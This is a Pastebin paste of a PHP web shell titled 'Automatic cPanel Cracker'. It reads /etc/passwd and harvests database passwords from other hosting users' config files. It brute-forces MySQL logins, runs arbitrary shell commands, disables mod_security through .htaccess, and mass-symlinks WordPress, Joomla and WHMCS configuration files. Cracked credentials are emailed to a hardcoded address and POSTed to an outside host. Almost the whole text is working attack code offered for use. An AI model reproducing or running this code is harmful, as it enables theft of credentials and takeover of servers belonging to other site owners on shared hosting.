Daikhi

wso2 2017

Jun 29th, 2017
55
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 82.62 KB | None | 0 0
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. echo '</head><body>';
  5. echo "
  6. <html>
  7. <body bgcolor=black>
  8. <head>
  9. <style type=text/css>
  10. body{
  11.     background-image:  url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFwAAAAuCAMAAACS246gAAAALVBMVEUREREMDAwSEhIUFBQQEBAODg4TExMPDw8XFxcVFRUWFhYNDQ0LCwsKCgoJCQmoaA8gAAACwElEQVR42rWW227tIAxEuYYQSP//c5ul0YicnL6CVIntmkXsMYYQQnxGSjmXEmOtIeR8HK3F2FrO53kctcZYSs69X1cI4xkhXFfv+M/Z2vWMWuczjuO6ln/Oe+FC984Y477nDAHkGMLjzjyE3oVm5k8BFALf2Bp2o/Uhu+GgU2otpRDm1G+WCo8bS0CBBpWSfh8HGztpb7Q+ZC8ccXJGmjGQcqEJ1SECQTJJOScjpes6z5RilP2LxroTrpCYIg1lJXRKcresKWmOmKCxlnIcpFQJXGiUhLcXPgYGBJVcKjcOFQvfeOb2Vvk5OcK/0fiNsRtOOmzETDGyFKjwbgU5K3SElMSGC7fQIWDdCyckB8TcSaAVaGnOamPvtkRrc5vD9j8a4ffCQRpPKJJTpcfBAgl+TjYw6luiRqsomNVayl44i0G6/RivKwOM8DEiH7hSvNH3yPvyUPMeYy+8VpxASiCcQKaEJG4FILH2zpZfNDhJyR+HD58598JxVDrmvO8YkbU1I3P2nCvi73ZAAi1la8Yj9F64gyQUHAxc+FKwg/ui5ywFD7x9kSA3eBrEXjjNyMcDOX3YhZTF194XHSPPECWUJkfy/Oig0e2FKw1jsMhozXUZkBCCpczeaLYDgngIaVFdiOD3wnE2MqV3cyVh9zNSegIMXzRtVwmgRGGM4Qah50ate+EEpofyCpzNaAUcdf3++8hbaoRc7UwlwlZ74Uq9ZfXDjACx+xn6RVO4bO7Ck4Rs4kcrH7YXLrMkpOAcGPhS/i1Oo7HGyLp1Ba708lmSeC9c6VBqDCJcjgQgW3yQQKs9cZF5c1+GoGHRoPfDe5fJ/16PBhcnAYO4b1/Ftq82ZbRSotleeO/nSZALD2bhsTP34X4/2Yz2tcYcNKX88xPjXrikQ9K3LOBx8yUMUi1qoZHVJYjXfRut9SFshf8CHnhfSb7xpWAAAAAASUVORK5CYII=')
  12. }
  13. input[type=text] {
  14. color:black;
  15. }
  16. a {
  17.      color : white;
  18.  
  19. }
  20. #terma {
  21.      color:black;
  22. }
  23. #kernel {
  24. }
  25. #exec {
  26.      
  27.      color:red;
  28. }
  29. #zeb {
  30.  
  31.      width: 525px;
  32.      height: 301px;
  33.      color:black;
  34. }
  35. input[type=submit] {
  36. background-color : black;
  37. }
  38. a:hover{
  39. border-bottom:1px solid aqua;
  40. }
  41. *{
  42.     font-size:11px;
  43.     font-family:Courier,Courier,Courier;
  44.     color:white;
  45. }
  46. #menu a{
  47.     padding:4px 18px;
  48.     margin:0;
  49.     background:darkred;
  50.     text-decoration:none;
  51.     letter-spacing:2px;
  52.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  53.  
  54. }
  55. </style>
  56.  
  57. <title>Automatic cPanel Cracker</title>
  58. </head>
  59. <br><center><div id=menu>
  60. <a href=?home>Home</a>
  61. <a href=?grab>Config</a>
  62. <a href=?cp>cPanel Automatic</a>
  63. <a href=?cp_jump>cPanel Jumping</a>
  64. <a href=?upl>Upload</a>
  65. </div></center>
  66. <p>
  67. <center>
  68. <img src=http://i.imgur.com/RhCNL7E.png width=260 height=300 /><br /></center><br><center><div id=menu>
  69. <a href=?jump>Jumping</a>
  70. <a href=?pws>Config Password</a>
  71. <a href=?x=symlink>Symlink</a>
  72. <a href=?cmd>CMD</a>
  73.  
  74. <a href=?cp_cracker>cPanel Brutus</a>
  75. </div></center>
  76.  
  77. <br><br><center id='kernel'>".php_uname()."<br>";
  78. echo '<img src="http://ww3s.ws/TR/HTML5/CSS3/fsocity.jpg"  height="0" width="0">';
  79. if(isset($_GET["cp_jump"])){
  80.  
  81.     echo '';
  82.     ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>');
  83.     set_time_limit(0);
  84.     ###################
  85.   @$passwd = fopen('/etc/passwd','r');
  86.     if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); }
  87.     $pub = array();
  88.     $users = array();
  89.     $conf = array();
  90.     $i = 0;
  91.     while(!feof($passwd))
  92.     {
  93.         $str = fgets($passwd);
  94.             if ($i > 35)
  95.             {
  96.                 $pos = strpos($str,':');
  97.                 $username = substr($str,0,$pos);
  98.                 $dirz = '/home/'.$username.'/public_html/';
  99.                 if (($username != ''))
  100.                 {
  101.                     if (is_readable($dirz))
  102.                     {
  103.                         array_push($users,$username);
  104.                         array_push($pub,$dirz);
  105.                     }
  106.                 }
  107.               }
  108.         $i++;
  109.     }
  110.     ###################
  111.   echo '<h1>CPaneL BruteForcer</h1><div class="transparan2"><br><br><textarea id=terma cols="100" rows="20">';
  112.     echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
  113.     echo "[+] Founded ".sizeof($pub)." readable public_html directories\n";
  114.     echo "[~] Searching for passwords in config files...\n\n";
  115.     foreach ($users as $user)
  116.     {
  117.         $path = "/home/$user/public_html/";
  118.         read_dir($path,$user);
  119.     }
  120.     echo "\n[+] Done\n";
  121.     function read_dir($path,$username)
  122.     {
  123.         if ($handle = opendir($path))
  124.         {
  125.             while (false !== ($file = readdir($handle)))
  126.             {
  127.                 $fpath = "$path$file";
  128.                 if (($file != '.') and ($file != '..'))
  129.                 {
  130.                     if (is_readable($fpath))
  131.                     {
  132.                         $dr = $fpath."/";
  133.                         if (is_dir($dr))
  134.                         {
  135.                             read_dir($dr,$username);
  136.                         }
  137.                         else
  138.                         {
  139.                              if (
  140.                                  ($file=='config.php')
  141.                              or ($file=='config.inc.php')
  142.                              or ($file=='conf.php')
  143.                              or ($file=='settings.php')
  144.                              or ($file=='configuration.php')
  145.                              or ($file=='wp_config.php')
  146.                              or ($file=='wp-config.php')
  147.                               or ($file=='inc.php')
  148.                              or ($file=='setup.php')
  149.                              or ($file=='dbconf.php')
  150.                              or ($file=='dbconfig.php')
  151.                              or ($file=='db.inc.php')
  152.                              or ($file=='dbconnect.php')
  153.                              or ($file=='connect.php')
  154.                              or ($file=='common.php')
  155.                              or ($file=='config_global.php')
  156.                              or ($file=='db.php')
  157.                              or ($file=='connect.inc.php')
  158.                              or ($file=='e107_config.php')
  159.                              or ($file=='dbconnect.inc.php'))
  160.                             {
  161.                                 $pass = get_pass($fpath);
  162.                                 if ($pass != '')
  163.                                 {
  164.                                     echo "[+] $fpath\n$pass\n";
  165.                                     ftp_check($username,$pass);
  166.                                 }
  167.                             }
  168.                         }
  169.                     }
  170.                 }
  171.             }
  172.         }
  173.     }
  174.     function get_pass($link)
  175.     {
  176.         @$config = fopen($link,'r');
  177.         while(!feof($config))
  178.         {
  179.             $line = fgets($config);
  180.             if (strstr($line,'pass')
  181.             or strstr($line,'pwd')
  182.             or strstr($line,'db_pass')
  183.             or strstr($line,'dbpass')
  184.             or strstr($line,'passwd'))
  185.             {
  186.                 if (strrpos($line,'"'))
  187.                 {
  188.                     preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass);
  189.                     $pass = str_replace("]=\"","",$pass);
  190.                 }
  191.      
  192.                 else
  193.                     preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass);
  194.                     $pass = str_replace("]='","",$pass);
  195.                 return $pass[2];
  196.             }
  197.         }
  198.     }
  199.     function ftp_check($login,$pass)
  200.     {
  201.         @$ftp = ftp_connect('127.0.0.1');
  202.         if ($ftp)
  203.         {
  204.             @$res = ftp_login($ftp,$login,$pass);
  205.             if ($res)
  206.             {
  207.                 echo '[FTP] '.$login.':'.$pass."  Success !\n\n";
  208.                
  209. $domain = $_SERVER['HTTP_HOST'];
  210. $p21 = 21;
  211. $p22 = 22;
  212. $p2082 = 2082;
  213. $cp22 = fsockopen($domain,$p22,$errno,$errstr,10);
  214. $cp21 = fsockopen($domain,$p21,$errno,$errstr,10);
  215. $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10);
  216.  
  217.  
  218. if(!$cp22)
  219. {$a1="Error";}
  220. else
  221. {$a1="Success";fclose($cp22);}
  222.  
  223. if(!$cp21)
  224. {$a2="Error";}
  225. else
  226. {$a2="Success";fclose($cp21);}
  227.  
  228. if(!$cp2082)
  229. {$a3="Error";}
  230. else
  231. {$a3="Success";fclose($cp2082);}
  232.  
  233.  
  234. $psn ="
  235. -------------------------------------------------------------------------\n
  236. Host : $domain\n
  237. User : $login\n
  238. Pass : $pass\n
  239. -------------------------------------------------------------------------\n
  240. Accept Port \n
  241. SSH : Port $a1\n
  242. FTP : Port $a2\n
  243. cPanel : Port $a3\n
  244. -------------------------------------------------------------------------\n
  245. n";
  246. $to = "schlachtmsi@gmail.com";
  247. $recip = "schlachtmsi@gmail.com";
  248. $subject = "cPanel AccesS Update";
  249. $headers = "From: update<news@cp-update.info>";
  250. mail($to,$subject,$psn,$headers);
  251. mail($recip,$subject,$psn,$headers);
  252.                 echo '[SSH] Port'   .':' .$a1. "  !\n\n";
  253.                 echo '[FTP] Port'   .':' .$a2. "  !\n\n";
  254.                 echo '[cPanel] Port' .':' .$a3. "  !\n\n";
  255.      
  256.             }
  257.             else ftp_quit($ftp);
  258.         }
  259.     }
  260.     echo '</textarea><br><br><b>BruteForce Completed ...</b></body></html>';
  261.  
  262. }
  263. if(isset($_GET["cp_cracker"])){
  264. if(function_exists('apache_setenv')){
  265. @apache_setenv('no-gzip', 1);}
  266. @ini_set('zlib.output_compression', 0);
  267. @ini_set('output_buffering ',0);
  268. @ini_set('implicit_flush', 1);
  269. @ob_implicit_flush(true);
  270. @ob_end_flush();
  271. $ipserver=$_SERVER['SERVER_ADDR'];
  272. echo '
  273. <html>
  274. <style> body {font-size: 12pt; font-family: "Times New Roman"; }</style><head>
  275.  
  276. </head>
  277. <title>cPanel brutus</title>
  278. <body text="#00FF00" bgcolor="#000000" vlink="#00BFFF" link="#FF0000" alink="#008000">
  279. <div align="center">
  280. <br>
  281.  
  282. </td></tr>
  283. </table>
  284. <br />';
  285.  
  286. if(!isset($_POST['submit'])){
  287. function execute($cfe) {
  288.     $res = '';
  289.     if ($cfe) {
  290.         if(function_exists('system')) {
  291.             @ob_start();
  292.             @system($cfe);
  293.             $res = @ob_get_contents();
  294.             @ob_end_clean();
  295.         } else if(function_exists('passthru')) {
  296.             @ob_start();
  297.             @passthru($cfe);
  298.             $res = @ob_get_contents();
  299.             @ob_end_clean();
  300.         } else if(function_exists('shell_exec')) {
  301.             $res = @shell_exec($cfe);
  302.         } else if(function_exists('exec')) {
  303.             @exec($cfe,$res);
  304.             $res = join("\n",$res);
  305.         } else if(@is_resource($f = @popen($cfe,"r"))) {
  306.             $res = '';
  307.             while(!@feof($f)) {
  308.                 $res .= @fread($f,1024);
  309.             }
  310.             @pclose($f);
  311.         }
  312.     }
  313.     return $res;
  314. }
  315. $default=execute("ls /var/mail");
  316. if(!$default){
  317. if($file=@file_get_contents('/etc/passwd')){
  318. $u=explode("\n",$file);
  319. foreach($u as $us){
  320. $uss=explode(":x:",$us);
  321. $default .=$uss[0]."\n";
  322. }
  323. }else if(function_exists('posix_getpwuid')){
  324. for($n2=500;$n2<10000;$n2++){
  325. $userinfo = posix_getpwuid($n2);
  326. $name=$userinfo['name'];
  327. if($name!=''){
  328. $default.=$name."\n";
  329. }
  330. }}else{$default="Could not get any username.try manually :)";}
  331. }
  332.  
  333. echo <<<EOF
  334. <form  method="POST">
  335. <div align='center'>
  336. <table width='55%' style='border: 2px dashed #FF0000; background-color: #000000; color:#C0C0C0'>
  337. <tr>
  338. <td align='center'>
  339. <span lang='en-us'><font color='#FF0000'><b>Usernames:</b></font></span>
  340.  
  341. <p align='center'>&nbsp;<textarea rows='30' name='usernames' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>$default</textarea><br/>
  342. </p></td>
  343. <td align='center'>
  344. <span lang='en-us'><font color='#FF0000'><b>Passwords:</b></font></span>
  345.  
  346. <p align='center'>&nbsp;<textarea rows='30' name='passwords' cols='30' style='border: 2px dashed #FFFFFF; background-color: #000000; color:#C0C0C0'>123123\n123456\n1234567\n12345678\n123456789\n112233\n332211\ntest\ntest123\ncpanel\npassword\npassword1\nabc123\na1b2c3\npassw0rd\nPassword\nPassw0rd\nuser\npasswd\npasswords\npass\nchangeme\niloveyou\nfuckyou\nadmin\nqwerty\n1q2w3e\nq1w2e3\nqazqaz\n1qazxsw2\n1qaz2wsx\nqazxsw\nqazwsx</textarea><br/>
  347. </p></td>
  348. </tr>
  349. </table><br/><input type='submit' value='    Subtmit    ' name='submit' style='color: #FF0000; font-weight: bold; border: 1px dashed #333333; background-color: #000000'></form>
  350. EOF;
  351. }else{
  352. $password=array_unique(explode("\n",$_POST['passwords']));
  353. $username=array_unique(explode("\n",$_POST['usernames']));
  354. if(!set_time_limit(0)){"<font color='red'><b>ALERT:</b> set_time_limit(0) failed! Cracking will be interrupted!<br/></font>";}
  355. echo '[+]Cracking...<br/><hr width="67%" style="border: 4px dashed #FF0000;"><font color="white" size="4"><b>username<font color="red">:</font>password</b></font><br/><br/>';
  356. $count=0;
  357. $n=0;
  358. $start=time();
  359. foreach($username as $user){
  360. $count++;
  361. $user=trim($user);
  362. if ( @mysql_connect("localhost",$user,$user) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$user</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";$n++;continue;
  363. $success=$ipserver."|".$user."|".$user."\n";
  364. $ch = curl_init();
  365. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  366. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  367. curl_setopt($ch, CURLOPT_POST, 1);
  368. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success));
  369. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  370. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  371. curl_setopt($ch, CURLOPT_HEADER, 1);
  372. $buffer = curl_exec($ch);
  373. }
  374. foreach($password as $pass){
  375. $count++;
  376. $pass=trim($pass);
  377. if ( @mysql_connect("localhost",$user,$pass) ){echo "<font color='red'>$ipserver|$user</font>|<font color='red'>$pass</font><hr width='67%' style='border: 1px dashed #1D1D1D;'>";
  378. $success2=$ipserver."|".$user."|".$pass."\n";
  379. $ch = curl_init();
  380. curl_setopt($ch, CURLOPT_URL,"http://ww3s.ws/ok.php");
  381. curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 5.1; rv:18.0) Gecko/20100101 Firefox/18.0');
  382. curl_setopt($ch, CURLOPT_POST, 1);
  383. curl_setopt($ch, CURLOPT_POSTFIELDS,"result=".base64_encode($success2));
  384. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  385. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  386. curl_setopt($ch, CURLOPT_HEADER, 1);
  387. $buffer = curl_exec($ch);
  388. $n++;break;}
  389. }
  390. }
  391. $end= time() - $start;
  392. @$per=$count/$end;
  393. if($n){
  394. echo "[*]Successfully Cracked: <font color='red'><b>$n</b></font><br/>";}
  395. echo '<font color="#00FF00">[*]Time took: '.$end.' seconds for '.$count.' tries ('.$per.'/sec)</font><br/>';
  396. }
  397. }
  398.  
  399.  
  400. ############### MULAI DARI SINI #################
  401. if(isset($_GET["cmd"])){
  402.       echo "<br>";
  403. echo base64_decode("PGZvcm0gbWV0aG9kPSJwb3N0Ij4KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiIHZhbHVlPSJHbyI+CjwvZm9ybT4=");
  404.     $order=$_POST["command"];
  405.     $sub=$_POST["submit"];
  406.    
  407.     if(isset($sub)) {
  408.     echo  "<p id='exec'>".exec($order)."<p/>";
  409.     }
  410. }
  411. if(isset($_GET["grab"])){
  412. echo "<p><font face=Tahoma color=#007700 size=2pt>/etc/passwd content</p><br><form method=POST><textarea id=zeb name=passwd class=area rows=15 cols=60>";
  413. echo file_get_contents('/etc/passwd');
  414. echo "</textarea><br><br><input name=cat class=inputzbut size=100 value=Start ! type=submit><br></form></center><br>";  @error_reporting(0);
  415. @set_time_limit(0);
  416.  
  417. if($_POST["cat"] && !$_POST["passwd"]==""){
  418. echo "<center>Checking Smylink Functions ...<br></center>";
  419. $functions=@ini_get("disable_functions");
  420. if(eregi("symlink",$functions)){
  421. die("<center><font color=red>Symlink Function is DisableD, You Can't Continue This Process !!</font></center>");
  422. }
  423. echo "<center>Checking Done Without Problems, Start Grabbing ...<br></center>";
  424. @mkdir("xBlack_Configs", 0755);
  425. @chdir("xBlack_Configs");
  426. $htaccess="
  427. Options Indexes FollowSymLinks
  428. DirectoryIndex ssssss.htm
  429. AddType txt .php
  430. AddHandler txt .php
  431. <IfModule mod_autoindex.c>
  432. IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
  433. </ifModule>
  434. <IfModule mod_security.c>
  435. SecFilterEngine Off
  436. SecFilterScanPOST Off
  437. </IfModule>
  438. Options +FollowSymLinks
  439. DirectoryIndex Sux.html
  440. Options +Indexes
  441. AddType text/plain .php
  442. AddHandler server-parsed .php
  443. AddType text/plain .html
  444. ";
  445. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  446. $passwd=$_POST["passwd"];
  447. $passwd=explode("\n",$passwd);
  448. echo "<center>Starting Symlinking ...<br></center>";
  449. foreach($passwd as $pwd){
  450. $pawd=explode(":",$pwd);
  451. $user =$pawd[0];
  452. // Now symlink Them
  453.             @symlink('/home/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  454.             @symlink('/home/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  455.             @symlink('/home/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  456.             @symlink('/home/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  457.             @symlink('/home/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  458.             @symlink('/home/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  459.             @symlink('/home/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  460.             @symlink('/home/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  461.             @symlink('/home/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  462.             @symlink('/home/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  463.             @symlink('/home/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  464.             @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  465.             @symlink('/home/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  466.             @symlink('/home/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  467.             @symlink('/home/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  468.             @symlink('/home/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  469.             @symlink('/home/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  470.             @symlink('/home/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  471.         @symlink('/home/' . $user . '/public_html/php/conexion.php', $user . '-conexion-conexao.txt'); 
  472.             @symlink('/home/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  473.             @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  474.             @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  475.             @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  476.             @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  477.             @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  478.             @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  479.             @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  480.             @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  481.             @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  482.             @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  483.             @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  484.             @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  485.             @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
  486.             @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  487.             @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  488.             @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  489.             @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  490.             @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  491.             @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  492.             @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  493.             @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  494.             @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  495.             @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  496.             @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  497.             @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  498.             @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  499.             @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  500.             @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
  501.             @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  502.             @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  503.             @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  504.             @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  505.             @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  506.             @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  507.             @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  508.             @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  509.             @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  510.             @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  511.             @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  512.             @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  513.             @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  514.             @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  515.             @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  516.             @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  517.             @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  518.             @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  519.             @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  520.             @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  521.             @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  522.             @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  523.             @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  524.             @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt');
  525.             @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  526.             @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  527.             @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  528.             @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  529.             @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  530.             @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  531.             @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  532.             @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  533.             @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  534.             @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  535.             @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  536.             @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  537.             @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  538.             @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  539.             @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  540.             @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  541.             @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  542.             @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  543.             @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  544.             @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  545.             @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  546.             @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  547.             @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  548.             @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  549.             @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  550.             @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  551.             @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  552.             @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  553.             @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  554.             @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  555.             @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  556.             @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  557.             @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  558.             @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  559.             @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  560.             @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  561.             @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  562.             @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  563.             @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  564.             @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  565.             @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  566.             @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  567.             @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  568.             @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  569.             @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  570.             @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  571.             @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
